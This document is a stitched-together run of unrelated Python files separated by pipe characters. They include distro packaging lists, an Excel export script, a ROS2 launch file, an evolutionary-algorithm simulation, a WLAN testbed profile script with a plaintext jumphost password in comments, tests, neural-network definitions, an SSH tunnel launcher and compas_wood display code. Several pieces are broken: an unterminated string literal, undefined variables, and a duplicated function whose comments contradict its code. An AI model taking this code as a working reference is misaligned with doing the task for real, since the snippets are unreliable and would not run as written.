'foo': [{'bar': 'baz'}],
'bar': ['bar', 'baz'],
}
|
"""
List of Linux distributions that get packaging
https://wiki.ubuntu.com/Releases
https://www.debian.org/releases/
https://fedoraproject.org/wiki/Releases
https://fedoraproject.org/wiki/End_of_life
"""
ubuntu_deps = ["torsocks", "python3", "openssh-client", "sshfs", "conntrack"]
ubuntu_deps_2 = ubuntu_deps + ["python3-distutils"]
install_deb = """
apt-get -qq update
dpkg --unpack {} > /dev/null
apt-get -qq -f install > /dev/null
"""
fedora_deps = [
"python3", "torsocks", "openssh-clients", "sshfs", "conntrack-tools"
]
install_rpm = """
dnf -qy install {}
"""
distros = [
("ubuntu", "xenial", "deb", ubuntu_deps, install_deb), # 16.04 (LTS2021)
("ubuntu", "bionic", "deb", ubuntu_deps_2, install_deb), # 18.04 (LTS2023)
("ubuntu", "eoan", "deb", ubuntu_deps_2, install_deb), # 19.10 20200717
# ("ubuntu", "focal", "deb", ubuntu_deps_2, install_deb), # 20.04 (LTS2025)
("debian", "stretch", "deb", ubuntu_deps, install_deb), # 9
("debian", "buster", "deb", ubuntu_deps_2, install_deb), # 10
("fedora", "26", "rpm", fedora_deps, install_rpm), # EOL 2018-05-29
("fedora", "27", "rpm", fedora_deps, install_rpm), # EOL 2018-11-30
("fedora", "28", "rpm", fedora_deps, install_rpm), # EOL 2019-05-28
("fedora", "29", "rpm", fedora_deps, install_rpm), # EOL 2019-11-30
("fedora", "30", "rpm", fedora_deps, install_rpm), # EOL 2020-05-26
("fedora", "31", "rpm", fedora_deps, install_rpm),
# ("fedora", "32", "rpm", fedora_deps, install_rpm),
]
|
import pandas as pd
# Create a Pandas dataframe from some data.
data = [10, 20, 30, 40, 50, 60]
df = pd.DataFrame({'Heading': data,
'Longer heading that should be wrapped' : data})
out_path = r'C:\Users\Gael\Desktop\export_dataframe.xlsx'
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter(out_path, engine='xlsxwriter')
# Convert the dataframe to an XlsxWriter Excel object. Note that we turn off
# the default header and skip one row to allow us to insert a user defined
# header.
df.to_excel(writer, sheet_name='Sheet1', startrow=1,startcol=0, header=False, index=False)
# Get the xlsxwriter workbook and worksheet objects.
workbook = writer.book
worksheet = writer.sheets['Sheet1']
# Add a header format.
header_format = workbook.add_format({
'bold': True,
'text_wrap': True,
'valign': 'top',
'fg_color': '#D7E4BC',
'border': 1})
header_fmt = workbook.add_format({'font_name': 'Arial', 'font_size': 10, 'bold': True})
red_format = workbook.add_format({'bg_color':'red'})
worksheet.merge_range('B4:D4', 'Merged Range', header_format)
# Write the column headers with the defined format.
for col_num, value in enumerate(df.columns.values):
worksheet.write(0, col_num, value, header_format)
# Close the Pandas Excel writer and output the Excel file.
writer.save()
######FILLING EXCEL FILE ########
from openpyxl import load_workbook
import glob
import os
directory = r'C:\Users\Gael\Desktop\CODE\python'
all_files = glob.glob(os.path.join(directory, "*.xlsx))
def forwardfill(file):
df_flat_file = pd.read_excel(file, sheet_names=1, skiprows=1)
df_filled_file = df_flat_file.ffill()
book = load_workbook(file)
writer = pd.ExcelWriter(file, engine='openpyxl')
writer.book = book
writer.sheets = book.worksheets
writer.sheets = {ws.title: ws for ws in book.worksheets}
for sheetname in writer.sheets:
df_filled_file.to_excel(writer, sheet_name=sheetname, startrow=1, startcol=0, index=False, header=False)
writer.save()
for path in all_files:
forwardfill(path)
|
#
# LGE Advanced Robotics Laboratory
# Copyright (c) 2020 LG Electronics Inc., LTD., Seoul, Korea
# All Rights are Reserved.
#
# SPDX-License-Identifier: MIT
#
import os
import sys
import launch.actions
import launch_ros.actions
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from cloud_bridge_launch_common import *
def generate_launch_description():
# Set remapping topic list
remap_topic_list = ['tf', 'tf_static']
# Get the launch directory
config_dir = os.path.join(get_package_share_directory("cloud_bridge"), 'config')
# Get config filename
config_filename = os.path.join(config_dir, 'server.yaml')
param_filename = os.path.join(config_dir, 'params.yaml')
# Create our own temporary YAML files that include substitutions
rewritten_list = ['manage_port', 'sub_port', 'pub_port', 'req_port', 'rep_port']
configured_params = get_configured_params(config_filename, rewritten_list)
# Get namespace in argument
namespace = find_robot_name()
# Set remapping topic tuple list
remapping_list = set_remapping_list(remap_topic_list)
# Create environment variables
stdout_linebuf_envvar = launch.actions.SetEnvironmentVariable(
'RCUTILS_CONSOLE_STDOUT_LINE_BUFFERED', '1')
# Create actions nodes
cloud_trans_server = launch_ros.actions.Node(
package='cloud_bridge',
node_executable='cloud_bridge_server',
node_namespace=namespace,
remappings=remapping_list,
parameters=[configured_params, param_filename],
output='screen')
# Create the launch description and populate
ld = launch.LaunchDescription()
ld.add_action(stdout_linebuf_envvar)
ld.add_action(cloud_trans_server)
return ld
|
import tkinter as tk
from tkinter import messagebox
root = tk.Tk()
root.withdraw()
__all__ = ['universal']
|
import collections
import itertools
import re
import sys
import typing
from copy import deepcopy
class Point(typing.NamedTuple):
x: int
y: int
Grid = list[list[str]]
def main():
with open(sys.argv[1]) as f:
grid: Grid = [list(line.strip()) for line in f.readlines()]
height = len(grid)
width = len(grid[0])
turn = 0
for turn in itertools.count(1):
grid, move_count = iterate(grid, height, width)
if move_count == 0:
break
print(turn)
def iterate(grid: Grid, height: int, width: int) -> tuple[Grid, int]:
new_grid = deepcopy(grid)
move_count = 0
# east
for m in east_moves(grid, height, width):
move_count += 1
new_grid[m.y][m.x] = '.'
new_grid[m.y][(m.x + 1) % width] = '>'
# south
for m in list(south_moves(new_grid, height, width)):
move_count += 1
new_grid[m.y][m.x] = '.'
new_grid[(m.y + 1) % height][m.x] = 'v'
return new_grid, move_count
def east_moves(grid: Grid, height: int, width: int) -> typing.Iterable[Point]:
for y in range(height):
for x in range(width):
if grid[y][x] == '>' and grid[y][(x + 1) % width] == '.':
yield Point(x, y)
def south_moves(grid: Grid, height: int, width: int) -> typing.Iterable[Point]:
for y in range(height):
for x in range(width):
if grid[y][x] == 'v' and grid[(y + 1) % height][x] == '.':
yield Point(x, y)
if __name__ == '__main__':
main()
|
"""Run a discrete-event simulation of an asynchronous evolutionary
algorithm with only cloning and selection, so we can track the
takeover times of particular genomes."""
import inspect
import os
import sys
from matplotlib import pyplot as plt
import numpy as np
import toolz
from leap_ec import ops, probe
from leap_ec import Individual, Representation
from leap_ec.algorithm import generational_ea
from leap_ec.problem import ConstantProblem, FunctionProblem
from leap_ec.real_rep import problems as real_prob
from async_sim import components as co
##############################
# Entry point
##############################
if __name__ == '__main__':
##############################
# Parameters
##############################
gui = True
# When running the test harness, just run for two generations
# (we use this to quickly ensure our examples don't get bitrot)
if os.environ.get(co.test_env_var, False) == 'True':
jobs = 1
max_births = 2
else:
jobs = 50
max_births=float('inf') # No limit on births; stopping condition is max_time
max_time = 10000
pop_size = 50
num_processors=pop_size
modulo = 10
low_eval_time = 1
high_eval_time = 100
init_strategy = 'immediate' # Can be 'immediate', 'until_all_evaluating', or 'extra'
##############################
# Problem
##############################
problem = FunctionProblem(lambda x: 0 if x=='LOW' else 100, maximize=True)
eval_time_prob = FunctionProblem(lambda x: low_eval_time if x=='LOW' else high_eval_time, maximize=True)
##############################
# Setup
##############################
#experiment_note = f"\"takover (low={low_eval_time}, high={high_eval_time})\""
#experiment_note = init_strategy
experiment_note = "select(parents+processing)"
eval_time_f = lambda x: eval_time_prob.evaluate(x)
plt.figure(figsize=(20, 4))
##############################
# Evolve
##############################
with open('birth_times.csv', 'w') as births_file:
for job_id in range(jobs):
##############################
# Setup Metrics and Simulation
##############################
if gui:
plt.subplot(144) # Put the Gantt plot on the far right
p = co.GanttPlotProbe(ax=plt.gca(), max_bars=100, modulo=modulo)
gui_steadystate_probes = [ p ]
else:
gui_steadystate_probes = []
# Set up the cluster simulation.
# This mimics an asynchronous evaluation engine, which may return individuals in an order different than they were submitted.
eval_cluster = co.AsyncClusterSimulation(
num_processors=num_processors,
eval_time_function=eval_time_f,
# Individual-level probes (these run just on the newly evaluated individual)
probes=[
probe.AttributesCSVProbe(attributes=['birth', 'start_time', 'end_time', 'eval_time'],
notes={ 'job': job_id }, header=(job_id==0), stream=births_file)
] + gui_steadystate_probes)
# Set up probes for real-time visualizatiion
if gui:
plt.subplot(141)
p1 = probe.HistPhenotypePlotProbe(ax=plt.gca(), modulo=modulo, title="Genotype Histogram")
plt.subplot(142)
p2 = probe.PopulationMetricsPlotProbe(ax=plt.gca(), modulo=modulo,
title="Fraction of Population with 'HIGH' genotype (by step).",
metrics=[ lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x) ])
plt.subplot(143)
p3 = probe.PopulationMetricsPlotProbe(ax=plt.gca(), modulo=modulo,
title="Fraction of Population with 'HIGH' genotype (by time).",
metrics=[ lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x) ],
x_axis_value=lambda: eval_cluster.time)
# Leave the dashboard in its own window
p4 = co.AsyncClusterDashboardProbe(cluster_sim=eval_cluster, modulo=modulo)
gui_probes = [ p1, p2, p3, p4 ]
else:
gui_probes = []
# Defining representation up front, so we can use it a couple different places
representation=Representation(
# Initialize a population of integer-vector genomes
initialize=co.single_high_initializer()
)
# GO!
ea = generational_ea(max_generations=max_births,pop_size=pop_size,
# Stopping condition is based on simulation time
stop=lambda x: eval_cluster.time > max_time,
# We use an asynchronous scheme to evaluate the initial population
init_evaluate=co.async_init_evaluate(
cluster_sim=eval_cluster,
strategy=init_strategy,
create_individual=lambda: representation.create_individual(problem)),
problem=problem, # Fitness function
# Representation
representation=representation,
# Operator pipeline
pipeline=[
co.steady_state_step(
reproduction_pipeline=[
#ops.random_selection,
co.select_with_processing(ops.random_selection, eval_cluster),
ops.clone
],
insert=co.competition_inserter(p_accept_even_if_worse=0.0, pop_size=pop_size,
replacement_selector=ops.random_selection
),
# This tells the steady-state algorithm to use asynchronous evaluation
evaluation_op=co.async_evaluate(cluster_sim=eval_cluster)
),
# Population-level probes (these run on all individuals in the population)
probe.FitnessStatsCSVProbe(stream=sys.stdout, header=(job_id==0), modulo=modulo,
comment=inspect.getsource(sys.modules[__name__]), # Put the entire source code in the comments
notes={'experiment': experiment_note, 'job': job_id},
extra_metrics={
'time': lambda x: eval_cluster.time,
'birth': lambda x: eval_cluster.birth,
'mean_eval_time': lambda x: np.mean([ind.eval_time for ind in x]),
'LOW_ratio': lambda x: len([ ind for ind in x if ind.genome == 'LOW'])/len(x),
'HIGH_ratio': lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x)
}
)
] + gui_probes
)
# Er, actually go!
list(ea)
|
#!/usr/bin/python3 -u
# Example to set profile on NOLA-12 testbed:
# ./sdk_set_profile.py --testrail-user-id NONE --model ecw5410 --ap-jumphost-address localhost --ap-jumphost-port 8823 --ap-jumphost-password pumpkin77 \
# --ap-jumphost-tty /dev/ttyAP1 --testbed "NOLA-12" --lanforge-ip-address localhost --lanforge-port-number 8822 \
# --default-ap-profile TipWlan-2-Radios --sdk-base-url https://wlan-portal-svc-ben-testbed.cicd.lab.wlan.tip.build --skip-radius
# Example to set profile on NOLA-01 testbed
# ./sdk_set_profile.py --testrail-user-id NONE --model ecw5410 --ap-jumphost-address localhost --ap-jumphost-port 8803 \
# --ap-jumphost-password pumpkin77 --ap-jumphost-tty /dev/ttyAP1 --testbed "NOLA-01" --lanforge-ip-address localhost \
# --lanforge-port-number 8802 --default-ap-profile TipWlan-2-Radios --sdk-base-url https://wlan-portal-svc.cicd.lab.wlan.tip.build \
# --skip-radius
import sys
sys.path.append(f'../tests')
from UnitTestBase import *
from cloudsdk import CreateAPProfiles
def main():
parser = argparse.ArgumentParser(description="SDK Set Profile", add_help=False)
parser.add_argument("--default-ap-profile", type=str,
help="Default AP profile to use as basis for creating new ones, typically: TipWlan-2-Radios or TipWlan-3-Radios",
required=True)
parser.add_argument("--skip-radius", dest="skip_radius", action='store_true',
help="Should we skip the RADIUS configs or not")
parser.add_argument("--skip-wpa", dest="skip_wpa", action='store_true',
help="Should we skip the WPA ssid or not")
parser.add_argument("--skip-wpa2", dest="skip_wpa2", action='store_true',
help="Should we skip the WPA2 ssid or not")
parser.set_defaults(skip_radius=False)
parser.set_defaults(skip_wpa=False)
parser.set_defaults(skip_wpa2=False)
parser.add_argument("--skip-profiles", dest="skip_profiles", action='store_true',
help="Should we skip creating new ssid profiles?")
parser.set_defaults(skip_profiles=False)
parser.add_argument("--psk-5g-wpa2", type=str,
help="Allow over-riding the 5g-wpa2 PSK value.")
parser.add_argument("--psk-5g-wpa", type=str,
help="Allow over-riding the 5g-wpa PSK value.")
parser.add_argument("--psk-2g-wpa2", type=str,
help="Allow over-riding the 2g-wpa2 PSK value.")
parser.add_argument("--psk-2g-wpa", type=str,
help="Allow over-riding the 2g-wpa PSK value.")
parser.add_argument("--ssid-5g-wpa2", type=str,
help="Allow over-riding the 5g-wpa2 SSID value.")
parser.add_argument("--ssid-5g-wpa", type=str,
help="Allow over-riding the 5g-wpa SSID value.")
parser.add_argument("--ssid-2g-wpa2", type=str,
help="Allow over-riding the 2g-wpa2 SSID value.")
parser.add_argument("--ssid-2g-wpa", type=str,
help="Allow over-riding the 2g-wpa SSID value.")
base = UnitTestBase("skd-set-profile", parser)
command_line_args = base.command_line_args
# cmd line takes precedence over env-vars.
cloudSDK_url = command_line_args.sdk_base_url # was os.getenv('CLOUD_SDK_URL')
local_dir = command_line_args.local_dir # was os.getenv('SANITY_LOG_DIR')
report_path = command_line_args.report_path # was os.getenv('SANITY_REPORT_DIR')
report_template = command_line_args.report_template # was os.getenv('REPORT_TEMPLATE')
## TestRail Information
tr_user = command_line_args.testrail_user_id # was os.getenv('TR_USER')
tr_pw = command_line_args.testrail_user_password # was os.getenv('TR_PWD')
milestoneId = command_line_args.milestone # was os.getenv('MILESTONE')
projectId = command_line_args.testrail_project # was os.getenv('PROJECT_ID')
testRunPrefix = command_line_args.testrail_run_prefix # os.getenv('TEST_RUN_PREFIX')
##Jfrog credentials
jfrog_user = command_line_args.jfrog_user_id # was os.getenv('JFROG_USER')
jfrog_pwd = command_line_args.jfrog_user_password # was os.getenv('JFROG_PWD')
##EAP Credentials
identity = command_line_args.eap_id # was os.getenv('EAP_IDENTITY')
ttls_password = command_line_args.ttls_password # was os.getenv('EAP_PWD')
## AP Credentials
ap_username = command_line_args.ap_username # was os.getenv('AP_USER')
##LANForge Information
lanforge_ip = command_line_args.lanforge_ip_address
lanforge_port = command_line_args.lanforge_port_number
lanforge_prefix = command_line_args.lanforge_prefix
lanforge_2g_radio = command_line_args.lanforge_2g_radio
lanforge_5g_radio = command_line_args.lanforge_5g_radio
build = command_line_args.build_id
logger = base.logger
hdlr = base.hdlr
if command_line_args.testbed == None:
print("ERROR: Must specify --testbed argument for this test.")
sys.exit(1)
client: TestRail_Client = TestRail_Client(command_line_args)
###Get Cloud Bearer Token
cloud: CloudSDK = CloudSDK(command_line_args)
bearer = cloud.get_bearer(cloudSDK_url, cloud_type)
cloud.assert_bad_response = True
model_id = command_line_args.model
equipment_id = command_line_args.equipment_id
print("equipment-id: %s" % (equipment_id))
if equipment_id == "-1":
eq_id = ap_ssh_ovsh_nodec(command_line_args, 'id')
print("EQ Id: %s" % (eq_id))
# Now, query equipment to find something that matches.
eq = cloud.get_customer_equipment(cloudSDK_url, bearer, customer_id)
for item in eq:
for e in item['items']:
print(e['id'], " ", e['inventoryId'])
if e['inventoryId'].endswith("_%s" % (eq_id)):
print("Found equipment ID: %s inventoryId: %s" % (e['id'], e['inventoryId']))
equipment_id = str(e['id'])
if equipment_id == "-1":
print("ERROR: Could not find equipment-id.")
sys.exit(1)
###Get Current AP Firmware and upgrade
try:
ap_cli_info = ssh_cli_active_fw(command_line_args)
ap_cli_fw = ap_cli_info['active_fw']
except Exception as ex:
print(ex)
logging.error(logging.traceback.format_exc())
ap_cli_info = "ERROR"
print("FAILED: Cannot Reach AP CLI.");
sys.exit(1)
fw_model = ap_cli_fw.partition("-")[0]
print('Current Active AP FW from CLI:', ap_cli_fw)
###Find Latest FW for Current AP Model and Get FW ID
############################################################################
#################### Create Report #########################################
############################################################################
# Create Report Folder for Today
today = str(date.today())
try:
os.mkdir(report_path + today)
except OSError:
print("Creation of the directory %s failed" % report_path)
else:
print("Successfully created the directory %s " % report_path)
logger.info('Report data can be found here: ' + report_path + today)
##Get Bearer Token to make sure its valid (long tests can require re-auth)
bearer = cloud.get_bearer(cloudSDK_url, cloud_type)
radius_name = "%s-%s-%s" % (command_line_args.testbed, fw_model, "Radius")
obj = CreateAPProfiles(command_line_args, cloud=cloud, client=client, fw_model=fw_model)
# Allow cmd-line to override
if command_line_args.psk_5g_wpa2:
obj.psk_data["5g"]["wpa2"]["name"] = command_line_args.psk_5g_wpa2
obj.psk_data["5g"]["wpa2"]["nat"] = command_line_args.psk_5g_wpa2
obj.psk_data["5g"]["wpa2"]["vlan"] = command_line_args.psk_5g_wpa2
if command_line_args.psk_5g_wpa:
obj.psk_data["5g"]["wpa"]["name"] = command_line_args.psk_5g_wpa
obj.psk_data["5g"]["wpa"]["nat"] = command_line_args.psk_5g_wpa
obj.psk_data["5g"]["wpa"]["vlan"] = command_line_args.psk_5g_wpa
if command_line_args.psk_2g_wpa2:
obj.psk_data["2g"]["wpa2"]["name"] = command_line_args.psk_2g_wpa2
obj.psk_data["2g"]["wpa2"]["nat"] = command_line_args.psk_2g_wpa2
obj.psk_data["2g"]["wpa2"]["vlan"] =command_line_args.psk_2g_wpa2
if command_line_args.psk_2g_wpa:
obj.psk_data["2g"]["wpa"]["name"] = command_line_args.psk_2g_wpa
obj.psk_data["2g"]["wpa"]["nat"] = command_line_args.psk_2g_wpa
obj.psk_data["2g"]["wpa"]["nat"] = command_line_args.psk_2g_wpa
if command_line_args.ssid_5g_wpa2:
obj.ssid_data["5g"]["wpa2"]["name"] = command_line_args.ssid_5g_wpa2
obj.ssid_data["5g"]["wpa2"]["nat"] = command_line_args.ssid_5g_wpa2
obj.ssid_data["5g"]["wpa2"]["vlan"] = command_line_args.ssid_5g_wpa2
if command_line_args.ssid_5g_wpa:
obj.ssid_data["5g"]["wpa"]["name"] = command_line_args.ssid_5g_wpa
obj.ssid_data["5g"]["wpa"]["nat"] = command_line_args.ssid_5g_wpa
obj.ssid_data["5g"]["wpa"]["vlan"] = command_line_args.ssid_5g_wpa
if command_line_args.ssid_2g_wpa2:
obj.ssid_data["2g"]["wpa2"]["name"] = command_line_args.ssid_2g_wpa2
obj.ssid_data["2g"]["wpa2"]["nat"] = command_line_args.ssid_2g_wpa2
obj.ssid_data["2g"]["wpa2"]["vlan"] = command_line_args.ssid_2g_wpa2
if command_line_args.ssid_2g_wpa:
obj.ssid_data["2g"]["wpa"]["name"] = command_line_args.ssid_2g_wpa
obj.ssid_data["2g"]["wpa"]["nat"] = command_line_args.ssid_2g_wpa
obj.ssid_data["2g"]["wpa"]["vlan"] = command_line_args.ssid_2g_wpa
print("creating Profiles")
ssid_template = "TipWlan-Cloud-Wifi"
if not command_line_args.skip_profiles:
if not command_line_args.skip_radius:
obj.create_radius_profile(radius_name, rid, key)
obj.create_ssid_profiles(ssid_template=ssid_template, skip_wpa2=command_line_args.skip_wpa2,
skip_wpa=command_line_args.skip_wpa, skip_eap=command_line_args.skip_radius)
print("Create AP with equipment-id: ", equipment_id)
obj.create_ap_bridge_profile(eq_id=equipment_id, fw_model=fw_model)
obj.validate_changes()
print("Profiles Created")
main()
|
from collections import deque
import random
class Queue:
def __init__ (self):
self._init ()
self._req_id = 0
self._consumed = 0
def qsize (self):
return len (self.q)
@property
def req_id (self):
req_id = self._req_id
self._req_id += 1
return req_id
def add (self, req):
self._add (req)
def first (self, req):
self._first (req)
def get (self):
try:
self._consumed += 1
return self._get ()
except IndexError:
return None
def _init (self):
self.q = deque ()
def _add (self, req):
self.q.append (req)
def _first (self, req):
self.q.append (req)
self.q.rotate (1)
def _get (self):
return self.q.popleft ()
class RandomQueue (Queue):
def _init (self):
self.q = []
def _add (self, req):
lq = len (self.q)
if lq == 0:
self.q.append (req)
else:
self.q.insert(random.randrange (lq), req)
def _first (self, req):
self.q.insert (0, req)
def _get (self):
return self.q.pop (0)
|
# Generated by Django 2.2 on 2020-11-05 01:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0052_auto_20201105_0026'),
]
operations = [
migrations.AddField(
model_name='user',
name='country_code',
field=models.CharField(blank=True, max_length=4, null=True),
),
]
|
from rdflib import Literal, URIRef
from rdflib.namespace import OWL, RDF, XSD
from client.model import (
Concept,
RDFDataset,
FeatureOfInterest,
Value,
Observation,
)
from client.model._TERN import TERN
# TODO: Confirm this testing is sufficient
def test_basic_rdf():
rdfdataset1 = RDFDataset()
foi1 = FeatureOfInterest(
Concept(),
rdfdataset1,
)
s1 = Observation(
rdfdataset1,
Value(),
foi1,
URIRef("https://example.com/simpleresult/x"),
URIRef("http://example.com/observedproperty/x"),
URIRef("http://example.com/instant/x"),
Literal("2001-01-01", datatype=XSD.date),
URIRef("https://example.com/procedure/x/"),
)
rdf = s1.to_graph()
assert (None, RDF.type, OWL.Class) not in rdf
assert (None, RDF.type, TERN.Observation)
|
import unittest
import uuid
from requests import PreparedRequest, Response, Session
from unittest.mock import patch, Mock
from identixone.http.client import IdentixOneHttpClient
class TestHttpClientRequest(unittest.TestCase):
def setUp(self):
self.session_patch = patch('identixone.http.client.Session')
self.request_mock = Mock(wraps=PreparedRequest())
self.request_mock.headers = {}
self.session_mock = Mock(wraps=Session())
self.session_mock.prepare_request.return_value = self.request_mock
self.session_mock.send.return_value = Response()
self.session_mock.headers = {}
session_constructor_mock = self.session_patch.start()
session_constructor_mock.return_value = self.session_mock
self.auth_token = uuid.uuid4().hex
self.client = IdentixOneHttpClient(auth_token=self.auth_token)
def tearDown(self):
self.session_patch.stop()
def test_request_sets_common_headers(self):
self.client.request('method', 'URL')
assert self.client.session.headers['User-Agent'].startswith(
'identixone-python')
self.assertIsNotNone(self.client.session.headers['Request-ID'])
def test_set_accept_header_if_missing(self):
self.client.request('method', 'URL')
self.assertEqual(
'application/json', self.client.session.headers['Accept'])
def test_specify_accept_header_takes_effect(self):
self.client.request('method', 'URL', headers={'Accept': 'text/html'})
self.assertEqual('text/html', self.client.session.headers['Accept'])
|
def fcn_model(inputs, num_classes):
# Add Encoder Blocks.
# Remember that with each encoder layer, the depth of your model (the number of filters) increases.
print("Inputs shape:", inputs.shape, " \tImage Size in Pixels")
encoder01 = encoder_block(inputs, filters=32, strides=2)
print("encoder01 shape:", encoder01.shape, " \tEncoder Block 1")
encoder02 = encoder_block(encoder01, filters=64, strides=2)
print("encoder02 shape:", encoder02.shape, " \tEncoder Block 2")
encoder03 = encoder_block(encoder02, filters=128, strides=2)
print("encoder03 shape:", encoder03.shape, "\tEncoder Block 3")
# Add 1x1 Convolution layer using conv2d_batchnorm().
conv_1x1 = conv2d_batchnorm(encoder03, filters=256, kernel_size=1, strides=1)
print("conv_1x1 shape:", conv_1x1.shape, "\t1x1 Conv Layer")
# Add the same number of Decoder Blocks as the number of Encoder Blocks
decoder01 = decoder_block(conv_1x1, encoder02, filters=128)
print("decoder01 shape:", decoder01.shape, "\tDecoder Block 1")
decoder02 = decoder_block(decoder01, encoder01, filters=64)
print("decoder02 shape:", decoder02.shape, " \tDecoder Block 2")
decoder03 = decoder_block(decoder02, inputs, filters=32)
print("decoder03 shape:", decoder03.shape, "\tDecoder Block 3")
# The function returns the output layer of your model. "decoder03" is the final layer obtained from the last decoder_block()
# print("Outputs shape:", outputs.shape, "\tOutput Size in Pixel")
return layers.Conv2D(num_classes, 1, activation='softmax', padding='same')(decoder03)
def fcn_model(inputs, num_classes):
# TODO Add Encoder Blocks.
# Remember that with each encoder layer, the depth of your model (the number of filters) increases.
# conv2d 1st layer , input size is [,160,160,?]
encoder1 = encoder_block(inputs, 32, 2)
# conv2d 2nd layer, input size is [,80,80,32]
encoder2 = encoder_block(encoder1, 64, 2)
# conv2d 3rd layer, input size is [,40,40,64]
encoder3 = encoder_block(encoder2, 128, 2)
encoder4 = encoder_block(encoder3, 256, 2)
# now, the input size is [,20,20,128], next step is 1x1 convolution layer
# TODO Add 1x1 Convolution layer using conv2d_batchnorm().
conv_1x1 = conv2d_batchnorm(encoder4, 256, 1, 1)
# after conv_1x1 process, the tensor size become [,20,20,128]
# TODO: Add the same number of Decoder Blocks as the number of Encoder Blocks
decoder0 = decoder_block(conv_1x1, encoder4, 256)
decoder1 = decoder_block(decoder0, encoder2, 128)
decoder2 = decoder_block(decoder1, encoder1, 64)
decoder3 = decoder_block(decoder2, inputs, 32)
# The function returns the output layer of your model. "x" is the final layer obtained from the last decoder_block()
return layers.Conv2D(num_classes, 1, activation='softmax', padding='same')(decoder3)
|
import os
import app
import json
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def main():
try:
config_file = real_path('/config/config.json')
config = json.loads(open(config_file).read())
tunnel_type = str(config['tunnel_type'])
inject_host = str(config['inject_host'])
inject_port = int(config['inject_port'])
socks5_port_list = app.filter_array(config['socks5_port_list'])
except KeyError: app.json_error(config_file); return
if len(socks5_port_list) == 0: socks5_port_list.append('1080')
log_connecting = True if len(socks5_port_list) > 1 else False
quiet = True if len(socks5_port_list) > 1 else False
app.server((inject_host, inject_port), quiet=quiet).start()
ssh_clients = app.ssh_clients((inject_host, inject_port), socks5_port_list, log_connecting=log_connecting)
ssh_clients.accounts = app.generate_accounts(app.convert_hostnames(real_path('/database/accounts.json')))
ssh_clients.start()
if __name__ == '__main__':
main()
|
from enum import Enum
from concrete_class.hi_active_cooling import HighActiveCooling
from concrete_class.med_active_cooling import MedActiveCooling
from concrete_class.passive_cooling import PassiveCooling
class CoolingType(Enum):
PASSIVE = PassiveCooling()
HIGH_ACTIVE = HighActiveCooling()
MED_ACTIVE = MedActiveCooling()
|
import os
from compas.geometry.transformations import translation
os.system("cls")
import os
import numpy as np
import compas.geometry as cg
from compas.geometry import Point
from compas.geometry import Vector
from compas.geometry import Plane
from compas.geometry import Line
from compas.geometry import Polyline
from compas.datastructures import Mesh
from compas_view2.app import App
from compas_view2.objects import Collection
import compas_view2.objects as w
from compas_wood.CGAL import connectionDetection
from compas_wood.data import joinery_solver_cross
from compas_wood.data import joinery_solver_sideside
from compas_wood.data import JoinerySolverTopSideDataSet
from compas_wood.data import joinery_solver_annen
from compas_wood.data import joinery_solver_plates
def DisplayLines(viewer, lines, scale=0.01):
linesScaled = []
for i in lines:
l = cg.Line(i[0]*scale,i[1]*scale)
linesScaled.append(l)
viewer.add(Collection(linesScaled),color = (0, 0, 0), linewidth = 2)
def DisplayPolylinesAsMesh(viewer, polylines, type, scale=0.01):
outPolylines = [[],[],[],[]]
outPolylinesColors = [
(255/255.0,0/255.0,0/255.0),
(255/255.0,165/255.0,0/255.0),
(200/255.0,200/255.0,200/255.0),
(8/255.0,96/255.0,168/255.0)
]
#0 Red Side-Side 1 Yellow Top-Side 2 Grey Top-Top 3 Blue Cross
for i in range (len(polylines)):
polyline = polylines[i]
polyline.transform(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
mesh = cd.mesh.Mesh.from_polygons([polyline])
outPolylines[type[i]].append(mesh)
for i in range (len(outPolylines)):
#print(len(outPolylines[i]))
if(len(outPolylines[i])>0):
viewer.add(Collection(outPolylines[i]),color = outPolylinesColors[i],opacity=0.75)
def DisplayPolylines(viewer, polylines, scale=0.00,r = 0.0, g = 0.0, b = 0.0, t = 1, collection = True):
polylinesScaled = []
for i in polylines:
#print(i)
if(len(i)>1):
a = i.transformed(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
polylinesScaled.append(a)
if collection==False:
if(len(i)==4):
viewer.add(a,color=(0,0,255),linewidth = 1)
elif(len(i)==2):
viewer.add(a,color=(0,255,0),linewidth =10)
else:
viewer.add(a,color=(r,g,b), linewidth = t)
if collection:
if(len(polylinesScaled)):
viewer.add(Collection(polylinesScaled),color=(r,g,b), linewidth = t)
else:
print("Nothing is displayed")
def DisplayPolyline(viewer, polyline, scale=0.01,r = 0.0, g = 0.0, b = 0.0, t = 1):
if(len(polyline)>1):
y = polyline.transformed(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
viewer.add(y,color=(r,g,b), linewidth = t)
def test_connectionDetection():
# ==============================================================================
# Get a list of polyline pairs
# ==============================================================================
#input = PolylineDataSet.GetAnnenPolylineTwoPlates()
#for i in PolylineDataSet.GetAnnenPolylineTwoPlates():
# input.append(i.transformed(cg.transformations.Translation.from_vector(Vector(100, 0,0))))
#input = PolylineDataSet.GetAnnenPolyline()
#in-plane wrong - rotate correct
#input = JoinerySolverSideSideDataSet.SS24()#//0 7 Angles-14 FULL SET 14 // IN-PLANE 6 21, issues 3 - not detected 11,15,16 - strange offset, 21 - side-top not implemented
#input = JoinerySolverTopSideDataSet.TS8()#3 - errors with multiple connections, and flip for tenons, 7 - does not work
#input = PolylineDataSet.Test6()
#input = PolylineDataSet.TestCross14()#9 errors
#input = PolylineDataSet.TestChangeBasis()
# ==============================================================================
# GetConnectionZones
# ==============================================================================
input = joinery_solver_annen.annen_small_polylines()
"""
result = connectionDetection.GetConnectionZones(
input,
joinery_solver_annen.annen_small_edge_directions(),
joinery_solver_annen.annen_small_edge_joints(),
joinery_solver_annen.annen_small_three_valance_element_indices_and_instruction()
)
"""
#input = joinery_solver_sideside.SS26()
#input = joinery_solver_cross.TestCross9()#8
input = joinery_solver_sideside.SS12();
"""
input = joinery_solver_plates.ts_0_polylines()
result = connectionDetection.GetConnectionZones(
input,
joinery_solver_plates.ts_0_edge_directions()
